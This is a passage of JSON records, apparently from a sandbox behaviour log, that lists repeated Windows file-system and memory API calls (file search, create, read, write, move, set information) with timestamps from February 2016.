"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtCreateFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:03,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,754", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:03,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,804", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,904", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:03,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:03,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,974", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,004", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,064", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:04,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:42:04,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:04,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,154", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 